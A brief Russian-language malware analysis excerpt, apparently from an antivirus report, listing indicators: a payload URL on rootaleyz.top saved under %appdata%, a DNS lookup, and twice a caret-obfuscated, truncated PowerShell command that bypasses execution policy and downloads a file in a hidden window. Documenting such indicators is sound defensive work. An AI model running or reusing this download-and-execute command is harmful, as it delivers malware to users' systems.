Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^O^W^ErS^hE^l^l.E^x^e^ -EXe^c^utIOnP^Ol^ic^y B^yP^aSs -^N^Op^R^Ofile -wIND^o^WsTyl^e ^hIDd^EN^ (N^EW-Ob^Je^ct sYStEm.N^E^t.We^b^CL^IE^n^t)^.DoW^NLO^A^D^F^iLe('http://rootaleyz.t...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /C "p^O^W^ErS^hE^l^l.E^x^e^ -EXe^c^utIOnP^Ol^ic^y B^yP^aSs -^N^Op^R^Ofile -wIND^o^WsTyl^e ^hIDd^EN^ (N^EW-Ob^Je^ct sYStEm.N^E^t.We^b^CL^IE^n^t)^.DoW^NLO^A^D^F^iLe('http://rootaleyz.t...' (со скрытым окном)